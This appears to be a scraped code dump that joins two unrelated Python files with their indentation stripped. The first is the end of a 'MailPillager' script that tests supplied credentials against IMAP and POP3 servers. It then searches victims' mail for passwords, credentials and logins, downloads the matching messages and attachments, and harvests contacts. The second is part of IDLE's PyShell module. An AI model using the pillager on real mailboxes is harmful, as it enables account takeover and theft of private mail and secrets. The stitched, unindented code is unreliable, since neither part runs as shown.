return contacts
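    # Print the sender and subject of up to num of the most recent messages,
    # using the server-side SORT extension (REVERSE DATE) to order them newest-first.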
def getXsubjects(self, num=10):
if (not self.srv):
return
numMessages = self.srv.select(readonly=True)[1][0]
typ, data = self.getMessagesReverseOrder()
maxNum = num
if (int(numMessages) < int(num)):
maxNum = numMessages
i = 1
for num in data[0].split():
header = self.srv.fetch(num, '(BODY[HEADER])')
if (header):
header_data = header[1][0][1]
parser = email.parser.HeaderParser()
msg = parser.parsestr(header_data.decode())
print("#%i [%s] -> [%s]" %(i, msg['from'], msg['subject']))
i = i + 1
if (i > int(maxNum)):
return
return None
def getUIDs(self):
if (not self.srv):
return
if (not self.uids):
#get uids of all messages
self.srv.select(readonly=True)
result, data = self.srv.search(None, 'ALL')
self.uids = data[0].split()
def getMessagesReverseOrder(self, search_term='ALL'):
if (not self.srv):
return
self.srv.select(readonly=True)
sort_criteria = 'REVERSE DATE'
return self.srv.sort(sort_criteria, 'UTF-8', search_term)
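    # Build an IMAP SEARCH expression that ORs together one (part "term")
    # clause per search term, e.g. (OR (Subject "a") (Subject "b")) for two terms.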
def buildSearchTerm(self, part, terms):
if (not self.srv):
return
if (not part) or (not terms):
return
term_string = ""
i = 0
for term in terms:
temp = '(%s "%s")' % (part, term)
if (i > 0):
term_string = '(OR %s %s)' % (term_string, temp)
else:
term_string = temp
i = i + 1
return term_string
#-----------------------------------------------------------------------------
# IMAPS subclass of IMAP Class
#-----------------------------------------------------------------------------
class IMAPS(IMAP):
def __init__(self, outputdir="."):
IMAP.__init__(self, outputdir)
def connect(self, mailserver, port="993"):
self.mailserver = mailserver
self.port = port
try:
self.srv = imaplib.IMAP4_SSL(self.mailserver, self.port)
except:
self.srv = None
pass
#-----------------------------------------------------------------------------
# POP3 subclass of Pillager Class
#-----------------------------------------------------------------------------
class POP3(Pillager):
def __init__(self, outputdir="."):
Pillager.__init__(self, outputdir)
self.msg_list = None
def connect(self, mailserver, port="110"):
self.mailserver = mailserver
self.port = port
try:
self.srv = poplib.POP3(self.mailserver, self.port)
except:
self.srv = None
pass
def disconnect(self):
if (self.srv):
self.srv.quit()
def validate(self, user, password):
if (not self.srv):
return
self.user = user
self.password = password
try:
self.srv.user(self.user)
self.srv.pass_(self.password)
except poplib.error_proto as e:
return False
return True
def searchMessageBodies(self, term=None):
if (not self.srv):
return
if (not term):
return
self.getMessages()
matched = []
i = 1
for (server_msg, body, octets) in self.msg_list:
            body = b'\n'.join(body).decode(errors='replace')  # poplib returns the lines as bytes under Python 3
for search_term in term:
if re.search(search_term, body, re.IGNORECASE):
print("MATCHED ON [%s]" % (search_term))
if not i in matched:
matched.append(i)
i=i+1
return matched
def searchMessageSubjects(self, term=None):
if (not self.srv):
return
if (not term):
return
self.getMessages()
matched = []
i = 1
for (server_msg, body, octets) in self.msg_list:
            msg = email.message_from_bytes(b'\n'.join(body))  # poplib returns bytes lines under Python 3
for search_term in term:
if re.search(search_term, msg['subject'], re.IGNORECASE):
print("MATCHED ON [%s]" % (search_term))
if not i in matched:
matched.append(i)
i=i+1
return matched
def searchMessageAttachments(self, term=None):
if (not self.srv):
return
if (not term):
return
self.getMessages()
matched = []
i = 1
for (server_msg, body, octets) in self.msg_list:
            msg = email.message_from_bytes(b'\n'.join(body))  # poplib returns bytes lines under Python 3
            # look for attachments and match their filenames against the search terms
for part in msg.walk():
if part.get_content_maintype() == 'multipart':
continue
if part.get('Content-Disposition') is None:
continue
filename = part.get_filename()
if not(filename):
continue
for search_term in term:
if re.search(search_term, filename, re.IGNORECASE):
print("MATCHED ON [%s]" % (search_term))
if not i in matched:
matched.append(i)
i=i+1
return matched
def downloadMessage(self, messageid=None):
if (not self.srv):
return
if messageid:
(server_msg, body, octets) = self.srv.retr(messageid)
filename = self.user + "_" + str(messageid)
file_path = os.path.join(self.output_dir, filename)
print("Downloading message id [%s] to [%s]" % (messageid, file_path))
            # Check if it's already there
            if not os.path.isfile(file_path):
                # finally write the stuff
                fp = open(file_path, 'wb')
                fp.write(b'\n'.join(body))  # poplib returns bytes lines, and the file is opened in binary mode
fp.close()
return None
def downloadAttachment(self, messageid=None):
if (not self.srv):
return
if (not messageid):
return
(server_msg, body, octets) = self.srv.retr(messageid)
        msg = email.message_from_bytes(b'\n'.join(body))  # poplib returns bytes lines under Python 3
        # save any attachments found in the message parts
for part in msg.walk():
if part.get_content_maintype() == 'multipart':
continue
if part.get('Content-Disposition') is None:
continue
filename = part.get_filename()
if not(filename):
continue
file_path = os.path.join(self.output_dir, filename)
print("Downloading attachment [%s] to [%s]" % (messageid, file_path))
            # Check if it's already there
if not os.path.isfile(file_path) :
# finally write the stuff
fp = open(file_path, 'wb')
fp.write(part.get_payload(decode=True))
fp.close()
return None
def scrapeContacts(self):
if (not self.srv):
return
self.getMessages()
contacts = []
for (server_msg, body, octets) in self.msg_list:
            mail = email.message_from_bytes(b'\n'.join(body))  # poplib returns bytes lines under Python 3
for part in mail.walk():
fromaddr = part['from']
if (fromaddr):
sender = part['from'].split()[-1]
address = re.sub(r'[<>]','',sender)
                    # Ignore any occurrences of our own email address and add to the list
if not re.search(r'' + re.escape(self.user),address) and not address in contacts:
contacts.append(address)
                        print("IDENTIFIED new contact [%s]" % (address))
return contacts
def getXsubjects(self, num=10):
if (not self.srv):
return
self.getMessages()
for (server_msg, body, octets) in self.msg_list:
            msg2 = email.message_from_bytes(b'\n'.join(body))  # poplib returns bytes lines under Python 3
print("[%s] -> [%s]" %(msg2['from'], msg2['subject']))
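    # Retrieve and cache every message with RETR (message numbers are 1-based)
    # so the search and scrape helpers can share a single download pass.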
def getMessages(self):
if (not self.srv):
return
if (not self.msg_list):
(numMsgs, totalSize) = self.srv.stat()
self.msg_list = []
for i in range(numMsgs):
self.msg_list.append(self.srv.retr(i+1))
#-----------------------------------------------------------------------------
# POP3S subclass of POP3 Class
#-----------------------------------------------------------------------------
class POP3S(POP3):
def __init__(self, outputdir="."):
POP3.__init__(self, outputdir)
def connect(self, mailserver, port="995"):
self.mailserver = mailserver
self.port = port
try:
self.srv = poplib.POP3_SSL(self.mailserver, self.port)
except:
self.srv = None
pass
#-----------------------------------------------------------------------------
# Wrapper Class
#-----------------------------------------------------------------------------
class MailPillager():
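    # Per-mailbox worker run in its own thread: validate the credentials (with
    # and without the @domain suffix), then search, download, and scrape contacts.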
def tworker(self, mail_conn, username, password, domain, server, port):
valid = False
print("trying [%s]" % (username))
print("trying [%s@%s]" % (username, domain))
if (mail_conn.validate(username, password)):
valid = True
elif (mail_conn.validate(username+"@"+domain, password)):
valid = True
username = username+"@"+domain
if (valid):
print("USER [%s] with PASSWORD [%s] is valid on [%s:%i]" % (username, password, server, port))
matched_messages = []
matched_attachments = []
print("---------------Search Message Bodies [credential, account, password, login]")
matched_messages.extend(mail_conn.searchMessageBodies(term=["credential", "account", "password", "login"]))
print("---------------Search Message Subjects [credential, account, password, login]")
matched_messages.extend(mail_conn.searchMessageSubjects(term=["credential", "account", "password", "login"]))
print("---------------Search Message Attachments [credential, account, password, login]")
matched_attachments.extend(mail_conn.searchMessageAttachments(term=["credential", "account", "password", "login"]))
print("---------------Download Messages")
for uid in set(matched_messages):
mail_conn.downloadMessage(uid)
print("---------------Download Attachments")
for uid in set(matched_attachments):
mail_conn.downloadAttachment(uid)
print("---------------Scrape Contacts")
print(mail_conn.scrapeContacts())
print("---------------Get 10 Subjects")
print(mail_conn.getXsubjects())
print("---------------")
mail_conn.disconnect()
else:
print("USER [%s] with PASSWORD [%s] is NOT valid on [%s:%i]" % (username, password, server, port))
def pillage(self, username, password, server, port, domain, outputdir="."):
print("%s, %s, %s, %s" % (username, password, server, domain))
mail = None
if (port == 993):
mail = IMAPS(outputdir=outputdir)
elif (port == 143):
mail = IMAP(outputdir=outputdir)
elif (port == 995):
mail = POP3S(outputdir=outputdir)
elif (port == 110):
mail = POP3(outputdir=outputdir)
else:
print("ERROR, unknown port provided")
return
mail.connect(server)
t = Thread(target=self.tworker, args=(mail, username, password, domain, server, port,))
t.start()
#-----------------------------------------------------------------------------
# main test code
#-----------------------------------------------------------------------------
if __name__ == "__main__":
serverip = "x.x.x.x"
#username = "sjane@example.phish"
username = "user@domain.com"
password = "password"
domain = "domain.com"
mp = MailPillager()
# mp.pillage(username=username, password=password, server=serverip, port=143, domain=domain)
mp.pillage(username=username, password=password, server=serverip, port=993, domain=domain)
# mp.pillage(username=username, password=password, server=serverip, port=110, domain=domain)
# mp.pillage(username=username, password=password, server=serverip, port=995, domain=domain)
|
PyShell.py
|
#! /usr/bin/env python
import os
import os.path
import sys
import string
import getopt
import re
import socket
import time
import threading
import traceback
import types
import linecache
from code import InteractiveInterpreter
try:
from Tkinter import *
except ImportError:
print>>sys.__stderr__, "** IDLE can't import Tkinter. " \
"Your Python may not be configured for Tk. **"
sys.exit(1)
import tkMessageBox
from idlelib.EditorWindow import EditorWindow, fixwordbreaks
from idlelib.FileList import FileList
from idlelib.ColorDelegator import ColorDelegator
from idlelib.UndoDelegator import UndoDelegator
from idlelib.OutputWindow import OutputWindow
from idlelib.configHandler import idleConf
from idlelib import idlever
from idlelib import rpc
from idlelib import Debugger
from idlelib import RemoteDebugger
from idlelib import macosxSupport
IDENTCHARS = string.ascii_letters + string.digits + "_"
LOCALHOST = '127.0.0.1'
try:
from signal import SIGTERM
except ImportError:
SIGTERM = 15
# Override warnings module to write to warning_stream. Initialize to send IDLE
# internal warnings to the console. ScriptBinding.check_syntax() will
# temporarily redirect the stream to the shell window to display warnings when
# checking user's code.
global warning_stream
warning_stream = sys.__stderr__
try:
import warnings
except ImportError:
pass
else:
def idle_showwarning(message, category, filename, lineno,
file=None, line=None):
file = warning_stream
try:
file.write(warnings.formatwarning(message, category, filename,\
lineno, file=file, line=line))
except IOError:
pass ## file (probably __stderr__) is invalid, warning dropped.
warnings.showwarning = idle_showwarning
def idle_formatwarning(message, category, filename, lineno,
file=None, line=None):
"""Format warnings the IDLE way"""
s = "\nWarning (from warnings module):\n"
s += ' File \"%s\", line %s\n' % (filename, lineno)
line = linecache.getline(filename, lineno).strip() \
if line is None else line
if line:
s += " %s\n" % line
s += "%s: %s\n>>> " % (category.__name__, message)
return s
warnings.formatwarning = idle_formatwarning
def extended_linecache_checkcache(filename=None,
orig_checkcache=linecache.checkcache):
"""Extend linecache.checkcache to preserve the <pyshell#...> entries
Rather than repeating the linecache code, patch it to save the
<pyshell#...> entries, call the original linecache.checkcache()
(which destroys them), and then restore the saved entries.
orig_checkcache is bound at definition time to the original
method, allowing it to be patched.
"""
cache = linecache.cache
save = {}
for filename in cache.keys():
if filename[:1] + filename[-1:] == '<>':
save[filename] = cache[filename]
orig_checkcache()
cache.update(save)
# Patch linecache.checkcache():
linecache.checkcache = extended_linecache_checkcache
class PyShellEditorWindow(EditorWindow):
"Regular text edit window in IDLE, supports breakpoints"
def __init__(self, *args):
self.breakpoints = []
EditorWindow.__init__(self, *args)
self.text.bind("<<set-breakpoint-here>>", self.set_breakpoint_here)
self.text.bind("<<clear-breakpoint-here>>", self.clear_breakpoint_here)
self.text.bind("<<open-python-shell>>", self.flist.open_shell)
self.breakpointPath = os.path.join(idleConf.GetUserCfgDir(),
'breakpoints.lst')
# whenever a file is changed, restore breakpoints
if self.io.filename: self.restore_file_breaks()
def filename_changed_hook(old_hook=self.io.filename_change_hook,
self=self):
self.restore_file_breaks()
old_hook()
self.io.set_filename_change_hook(filename_changed_hook)
rmenu_specs = [("Set Breakpoint", "<<set-breakpoint-here>>"),
("Clear Breakpoint", "<<clear-breakpoint-here>>")]
def set_breakpoint(self, lineno):
text = self.text
filename = self.io.filename
text.tag_add("BREAK", "%d.0" % lineno, "%d.0" % (lineno+1))
try:
i = self.breakpoints.index(lineno)
except ValueError: # only add if missing, i.e. do once
self.breakpoints.append(lineno)
try: # update the subprocess debugger
debug = self.flist.pyshell.interp.debugger
debug.set_breakpoint_here(filename, lineno)
except: # but debugger may not be active right now....
pass
def set_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
self.set_breakpoint(lineno)
def clear_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
try:
self.breakpoints.remove(lineno)
except:
pass
text.tag_remove("BREAK", "insert linestart",\
"insert lineend +1char")
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_breakpoint_here(filename, lineno)
except:
pass
def clear_file_breaks(self):
if self.breakpoints:
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
self.breakpoints = []
text.tag_remove("BREAK", "1.0", END)
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_file_breaks(filename)
except:
pass
def store_file_breaks(self):
"Save breakpoints when file is saved"
# XXX 13 Dec 2002 KBK Currently the file must be saved before it can
# be run. The breaks are saved at that time. If we introduce
# a temporary file save feature the save breaks functionality
# needs to be re-verified, since the breaks at the time the
# temp file is created may differ from the breaks at the last
# permanent save of the file. Currently, a break introduced
# after a save will be effective, but not persistent.
# This is necessary to keep the saved breaks synched with the
# saved file.
#
# Breakpoints are set as tagged ranges in the text. Certain
# kinds of edits cause these ranges to be deleted: Inserting
# or deleting a line just before a breakpoint, and certain
# deletions prior to a breakpoint. These issues need to be
# investigated and understood. It's not clear if they are
# Tk issues or IDLE issues, or whether they can actually
# be fixed. Since a modified file has to be saved before it is
# run, and since self.breakpoints (from which the subprocess
# debugger is loaded) is updated during the save, the visible
# breaks stay synched with the subprocess even if one of these
# unexpected breakpoint deletions occurs.
breaks = self.breakpoints
filename = self.io.filename
try:
lines = open(self.breakpointPath,"r").readlines()
except IOError:
lines = []
new_file = open(self.breakpointPath,"w")
for line in lines:
if not line.startswith(filename + '='):
new_file.write(line)
self.update_breakpoints()
breaks = self.breakpoints
if breaks:
new_file.write(filename + '=' + str(breaks) + '\n')
new_file.close()
def restore_file_breaks(self):
self.text.update() # this enables setting "BREAK" tags to be visible
filename = self.io.filename
if filename is None:
return
if os.path.isfile(self.breakpointPath):
lines = open(self.breakpointPath,"r").readlines()
for line in lines:
if line.startswith(filename + '='):
breakpoint_linenumbers = eval(line[len(filename)+1:])
for breakpoint_linenumber in breakpoint_linenumbers:
self.set_breakpoint(breakpoint_linenumber)
def update_breakpoints(self):
"Retrieves all the breakpoints in the current window"
text = self.text
ranges = text.tag_ranges("BREAK")
linenumber_list = self.ranges_to_linenumbers(ranges)
self.breakpoints = linenumber_list
def ranges_to_linenumbers(self, ranges):
lines = []
for index in range(0, len(ranges), 2):
lineno = int(float(ranges[index]))
end = int(float(ranges[index+1]))
while lineno < end:
lines.append(lineno)
lineno += 1
return lines
# XXX 13 Dec 2002 KBK Not used currently
# def saved_change_hook(self):
# "Extend base method - clear breaks if module is modified"
# if not self.get_saved():
# self.clear_file_breaks()
# EditorWindow.saved_change_hook(self)
def _close(self):
"Extend base method - clear breaks when module is closed"
self.clear_file_breaks()
EditorWindow._close(self)
class PyShellFileList(FileList):
"Extend base class: IDLE supports a shell and breakpoints"
# override FileList's class variable, instances return PyShellEditorWindow
# instead of EditorWindow when new edit windows are created.
EditorWindow = PyShellEditorWindow
pyshell = None
def open_shell(self, event=None):
if self.pyshell:
self.pyshell.top.wakeup()
else:
self.pyshell = PyShell(self)
if self.pyshell:
if not self.pyshell.begin():
return None
return self.pyshell
class ModifiedColorDelegator(ColorDelegator):
"Extend base class: colorizer for the shell window itself"
def __init__(self):
ColorDelegator.__init__(self)
self.LoadTagDefs()
def recolorize_main(self):
self.tag_remove("TODO", "1.0", "iomark")
self.tag_add("SYNC", "1.0", "iomark")
ColorDelegator.recolorize_main(self)
def LoadTagDefs(self):
ColorDelegator.LoadTagDefs(self)
theme = idleConf.GetOption('main','Theme','name')
self.tagdefs.update({
"stdin": {'background':None,'foreground':None},
"stdout": idleConf.GetHighlight(theme, "stdout"),
"stderr": idleConf.GetHighlight(theme, "stderr"),
"console": idleConf.GetHighlight(theme, "console"),
})
class ModifiedUndoDelegator(UndoDelegator):
"Extend base class: forbid insert/delete before the I/O mark"
def insert(self, index, chars, tags=None):
try:
if self.delegate.compare(index, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.insert(self, index, chars, tags)
def delete(self, index1, index2=None):
try:
if self.delegate.compare(index1, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.delete(self, index1, index2)
class MyRPCClient(rpc.RPCClient):
def handle_EOF(self):
"Override the base class - just re-raise EOFError"
raise EOFError
class ModifiedInterpreter(InteractiveInterpreter):
def __init__(self, tkconsole):
self.tkconsole = tkconsole
locals = sys.modules['__main__'].__dict__
InteractiveInterpreter.__init__(self, locals=locals)
self.save_warnings_filters = None
self.restarting = False
self.subprocess_arglist = self.build_subprocess_arglist()
port = 8833
rpcclt = None
rpcpid = None
def spawn_subprocess(self):
args = self.subprocess_arglist
self.rpcpid = os.spawnv(os.P_NOWAIT, sys.executable, args)
def build_subprocess_arglist(self):
w = ['-W' + s for s in sys.warnoptions]
if 1/2 > 0: # account for new division
w.append('-Qnew')
# Maybe IDLE is installed and is being accessed via sys.path,
# or maybe it's not installed and the idle.py script is being
# run from the IDLE source directory.
del_exitf = idleConf.GetOption('main', 'General', 'delete-exitfunc',
default=False, type='bool')
if __name__ == 'idlelib.PyShell':
command = "__import__('idlelib.run').run.main(%r)" % (del_exitf,)
else:
command = "__import__('run').main(%r)" % (del_exitf,)
if sys.platform[:3] == 'win' and ' ' in sys.executable:
# handle embedded space in path by quoting the argument
decorated_exec = '"%s"' % sys.executable
else:
decorated_exec = sys.executable
return [decorated_exec] + w + ["-c", command, str(self.port)]
def start_subprocess(self):
# spawning first avoids passing a listening socket to the subprocess
self.spawn_subprocess()
#time.sleep(20) # test to simulate GUI not accepting connection
addr = (LOCALHOST, self.port)
# Idle starts listening for connection on localhost
for i in range(3):
time.sleep(i)
try:
self.rpcclt = MyRPCClient(addr)
break
except socket.error, err:
pass
else:
self.display_port_binding_error()
return None
# Accept the connection from the Python execution server
self.rpcclt.listening_sock.settimeout(10)
try:
self.rpcclt.accept()
except socket.timeout, err:
self.display_no_subprocess_error()
return None
self.rpcclt.register("stdin", self.tkconsole)
self.rpcclt.register("stdout", self.tkconsole.stdout)
self.rpcclt.register("stderr", self.tkconsole.stderr)
self.rpcclt.register("flist", self.tkconsole.flist)
self.rpcclt.register("linecache", linecache)
self.rpcclt.register("interp", self)
self.transfer_path()
self.poll_subprocess()
return self.rpcclt
def restart_subprocess(self):
if self.restarting:
return self.rpcclt
self.restarting = True
# close only the subprocess debugger
debug = self.getdebugger()
if debug:
try:
# Only close subprocess debugger, don't unregister gui_adap!
RemoteDebugger.close_subprocess_debugger(self.rpcclt)
except:
pass
# Kill subprocess, spawn a new one, accept connection.
self.rpcclt.close()
self.unix_terminate()
console = self.tkconsole
was_executing = console.executing
console.executing = False
self.spawn_subprocess()
try:
self.rpcclt.accept()
except socket.timeout, err:
self.display_no_subprocess_error()
return None
self.transfer_path()
# annotate restart in shell window and mark it
console.text.delete("iomark", "end-1c")
if was_executing:
console.write('\n')
console.showprompt()
halfbar = ((int(console.width) - 16) // 2) * '='
console.write(halfbar + ' RESTART ' + halfbar)
console.text.mark_set("restart", "end-1c")
console.text.mark_gravity("restart", "left")
console.showprompt()
# restart subprocess debugger
if debug:
# Restarted debugger connects to current instance of debug GUI
gui = RemoteDebugger.restart_subprocess_debugger(self.rpcclt)
# reload remote debugger breakpoints for all PyShellEditWindows
debug.load_breakpoints()
self.restarting = False
return self.rpcclt
def __request_interrupt(self):
self.rpcclt.remotecall("exec", "interrupt_the_server", (), {})
def interrupt_subprocess(self):
threading.Thread(target=self.__request_interrupt).start()
def kill_subprocess(self):
try:
self.rpcclt.close()
except AttributeError: # no socket
pass
self.unix_terminate()
self.tkconsole.executing = False
self.rpcclt = None
def unix_terminate(self):
"UNIX: make sure subprocess is terminated and collect status"
if hasattr(os, 'kill'):
try:
os.kill(self.rpcpid, SIGTERM)
except OSError:
# process already terminated:
return
else:
try:
os.waitpid(self.rpcpid, 0)
except OSError:
return
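    # Mirror this process's sys.path into the subprocess so user code resolves
    # imports the same way as IDLE itself.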
def transfer_path(self):
self.runcommand("""if 1:
import sys as _sys
_sys.path = %r
del _sys
\n""" % (sys.path,))
active_seq = None
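    # Poll the RPC link for a response to the active request; restart the
    # subprocess if the connection is lost, and reschedule itself via Tk's
    # after() unless the shell is closing.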
def poll_subprocess(self):
clt = self.rpcclt
if clt is None:
return
try:
response = clt.pollresponse(self.active_seq, wait=0.05)
except (EOFError, IOError, KeyboardInterrupt):
# lost connection or subprocess terminated itself, restart
# [the KBI is from rpc.SocketIO.handle_EOF()]
if self.tkconsole.closing:
return
response = None
self.restart_subprocess()
if response:
self.tkconsole.resetoutput()
self.active_seq = None
how, what = response
console = self.tkconsole.console
if how == "OK":
if what is not None:
print >>console, repr(what)
elif how == "EXCEPTION":
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.remote_stack_viewer()
elif how == "ERROR":
errmsg = "PyShell.ModifiedInterpreter: Subprocess ERROR:\n"
print >>sys.__stderr__, errmsg, what
print >>console, errmsg, what
# we received a response to the currently active seq number:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
# Reschedule myself
if not self.tkconsole.closing:
self.tkconsole.text.after(self.tkconsole.pollinterval,
self.poll_subprocess)
debugger = None
def setdebugger(self, debugger):
self.debugger = debugger
def getdebugger(self):
return self.debugger
def open_remote_stack_viewer(self):
"""Initiate the remote stack viewer from a separate thread.
This method is called from the subprocess, and by returning from this
method we allow the subprocess to unblock. After a bit the shell
requests the subprocess to open the remote stack viewer which returns a
static object looking at the last exception. It is queried through
the RPC mechanism.
"""
self.tkconsole.text.after(300, self.remote_stack_viewer)
return
def remote_stack_viewer(self):
from idlelib import RemoteObjectBrowser
oid = self.rpcclt.remotequeue("exec", "stackviewer", ("flist",), {})
if oid is None:
self.tkconsole.root.bell()
return
item = RemoteObjectBrowser.StubObjectTreeItem(self.rpcclt, oid)
from idlelib.TreeWidget import ScrolledCanvas, TreeNode
top = Toplevel(self.tkconsole.root)
theme = idleConf.GetOption('main','Theme','name')
background = idleConf.GetHighlight(theme, 'normal')['background']
sc = ScrolledCanvas(top, bg=background, highlightthickness=0)
sc.frame.pack(expand=1, fill="both")
node = TreeNode(sc.canvas, None, item)
node.expand()
# XXX Should GC the remote tree when closing the window
gid = 0
def execsource(self, source):
"Like runsource() but assumes complete exec source"
filename = self.stuffsource(source)
self.execfile(filename, source)
def execfile(self, filename, source=None):
"Execute an existing file"
if source is None:
source = open(filename, "r").read()
try:
code = compile(source, filename, "exec")
except (OverflowError, SyntaxError):
self.tkconsole.resetoutput()
tkerr = self.tkconsole.stderr
print>>tkerr, '*** Error in script or command!\n'
print>>tkerr, 'Traceback (most recent call last):'
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
else:
self.runcode(code)
def runsource(self, source):
"Extend base class method: Stuff the source in the line cache first"
filename = self.stuffsource(source)
self.more = 0
self.save_warnings_filters = warnings.filters[:]
warnings.filterwarnings(action="error", category=SyntaxWarning)
if isinstance(source, types.UnicodeType):
from idlelib import IOBinding
try:
source = source.encode(IOBinding.encoding)
except UnicodeError:
self.tkconsole.resetoutput()
self.write("Unsupported characters in input\n")
return
try:
# InteractiveInterpreter.runsource() calls its runcode() method,
# which is overridden (see below)
return InteractiveInterpreter.runsource(self, source, filename)
finally:
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
def stuffsource(self, source):
"Stuff source in the filename cache"
filename = "<pyshell#%d>" % self.gid
self.gid = self.gid + 1
lines = source.split("\n")
linecache.cache[filename] = len(source)+1, 0, lines, filename
return filename
def prepend_syspath(self, filename):
"Prepend sys.path with file's directory if not already included"
self.runcommand("""if 1:
_filename = %r
import sys as _sys
from os.path import dirname as _dirname
_dir = _dirname(_filename)
if not _dir in _sys.path:
_sys.path.insert(0, _dir)
del _filename, _sys, _dirname, _dir
\n""" % (filename,))
def showsyntaxerror(self, filename=None):
"""Extend base class method: Add Colorizing
Color the offending position instead of printing it and pointing at it
with a caret.
"""
text = self.tkconsole.text
stuff = self.unpackerror()
if stuff:
msg, lineno, offset, line = stuff
if lineno == 1:
pos = "iomark + %d chars" % (offset-1)
else:
pos = "iomark linestart + %d lines + %d chars" % \
(lineno-1, offset-1)
text.tag_add("ERROR", pos)
text.see(pos)
char = text.get(pos)
if char and char in IDENTCHARS:
text.tag_add("ERROR", pos + " wordstart", pos)
self.tkconsole.resetoutput()
self.write("SyntaxError: %s\n" % str(msg))
else:
self.tkconsole.resetoutput()
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
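    # Return (msg, lineno, offset, line) if the pending exception is a
    # SyntaxError that unpacks cleanly, otherwise None.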
def unpackerror(self):
type, value, tb = sys.exc_info()
ok = type is SyntaxError
if ok:
try:
msg, (dummy_filename, lineno, offset, line) = value
if not offset:
offset = 0
except:
ok = 0
if ok:
return msg, lineno, offset, line
else:
return None
def showtraceback(self):
"Extend base class method to reset output properly"
self.tkconsole.resetoutput()
self.checklinecache()
InteractiveInterpreter.showtraceback(self)
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.tkconsole.open_stack_viewer()
def checklinecache(self):
c = linecache.cache
for key in c.keys():
if key[:1] + key[-1:] != "<>":
del c[key]
def runcommand(self, code):
"Run the code without invoking the debugger"
# The code better not raise an exception!
if self.tkconsole.executing:
self.display_executing_dialog()
return 0
if self.rpcclt:
self.rpcclt.remotequeue("exec", "runcode", (code,), {})
else:
exec code in self.locals
return 1
def runcode(self, code):
"Override base class method"
if self.tkconsole.executing:
self.interp.restart_subprocess()
self.checklinecache()
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
debugger = self.debugger
try:
self.tkconsole.beginexecuting()
if not debugger and self.rpcclt is not None:
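                # Normal case with a subprocess: queue the code for the remote
                # execution server; the reply is handled later by poll_subprocess().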
self.active_seq = self.rpcclt.asyncqueue("exec", "runcode",
(code,), {})
elif debugger:
debugger.run(code, self.locals)
else:
exec code in self.locals
except SystemExit:
if not self.tkconsole.closing:
if tkMessageBox.askyesno(
"Exit?",
"Do you want to exit altogether?",
default="yes",
master=self.tkconsole.text):
raise
else:
self.showtraceback()
else:
raise
except:
if use_subprocess:
print >>self.tkconsole.stderr, \
"IDLE internal error in runcode()"
self.showtraceback()
self.tkconsole.endexecuting()
else:
if self.tkconsole.canceled:
self.tkconsole.canceled = False
print >>self.tkconsole.stderr, "KeyboardInterrupt"
else:
self.showtraceback()
finally:
if not use_subprocess:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
def write(self, s):
"Override base class method"
self.tkconsole.stderr.write(s)
def display_port_binding_error(self):
tkMessageBox.showerror(
"Port Binding Error",
"IDLE can't bind TCP/IP port 8833, which is necessary to "
"communicate with its Python execution server. Either "
"no networking is installed on this computer or another "
"process (another IDLE?) is using the port. Run IDLE with the -n "
"command line switch to start without a subprocess and refer to "
"Help/IDLE Help 'Running without a subprocess' for further "
"details.",
master=self.tkconsole.text)
def display_no_subprocess_error(self):
tkMessageBox.showerror(
"Subprocess Startup Error",
"IDLE's subprocess didn't make connection. Either IDLE can't "
"start a subprocess or personal firewall software is blocking "
"the connection.",
master=self.tkconsole.text)
def display_executing_dialog(self):
tkMessageBox.showerror(
"Already executing",
"The Python Shell window is already executing a command; "
"please wait until it is finished.",
master=self.tkconsole.text)
class PyShell(OutputWindow):
shell_title = "Python Shell"
# Override classes
ColorDelegator = ModifiedColorDelegator
UndoDelegator = ModifiedUndoDelegator
# Override menus
menu_specs = [
("file", "_File"),
("edit", "_Edit"),
("debug", "_Debug"),
("options", "_Options"),
("windows", "_Windows"),
("help", "_Help"),
]
if macosxSupport.runningAsOSXApp():
del menu_specs[-3]
menu_specs[-2] = ("windows", "_Window")
# New classes
from idlelib.IdleHistory import History
def __init__(self, flist=None):
if use_subprocess:
ms = self.menu_specs
if ms[2][0] != "shell":
ms.insert(2, ("shell", "She_ll"))
self.interp = ModifiedInterpreter(self)
if flist is None:
root = Tk()
fixwordbreaks(root)
root.withdraw()
flist = PyShellFileList(root)
#
OutputWindow.__init__(self, flist, None, None)
#
## self.config(usetabs=1, indentwidth=8, context_use_ps1=1)
self.usetabs = True
# indentwidth must be 8 when using tabs. See note in EditorWindow:
self.indentwidth = 8
self.context_use_ps1 = True
#
text = self.text
text.configure(wrap="char")
text.bind("<<newline-and-indent>>", self.enter_callback)
text.bind("<<plain-newline-and-indent>>", self.linefeed_callback)
text.bind("<<interrupt-execution>>", self.cancel_callback)
text.bind("<<end-of-file>>", self.eof_callback)
text.bind("<<open-stack-viewer>>", self.open_stack_viewer)
text.bind("<<toggle-debugger>>", self.toggle_debugger)
text.bind("<<toggle-jit-stack-viewer>>", self.toggle_jit_stack_viewer)
if use_subprocess:
text.bind("<<view-restart>>", self.view_restart_mark)
text.bind("<<restart-shell>>", self.restart_shell)
#
self.save_stdout = sys.stdout
self.save_stderr = sys.stderr
self.save_stdin = sys.stdin
from idlelib import IOBinding
self.stdout = PseudoFile(self, "stdout", IOBinding.encoding)
self.stderr = PseudoFile(self, "stderr", IOBinding.encoding)
self.console = PseudoFile(self, "console", IOBinding.encoding)
if not use_subprocess:
sys.stdout = self.stdout
sys.stderr = self.stderr
sys.stdin = self
#
self.history = self.History(self.text)
#
self.pollinterval = 50 # millisec
def get_standard_extension_names(self):
return idleConf.GetExtensions(shell_only=True)
reading = False
executing = False
canceled = False
endoffile = False
closing = False
def set_warning_stream(self, stream):
global warning_stream
warning_stream = stream
def get_warning_stream(self):
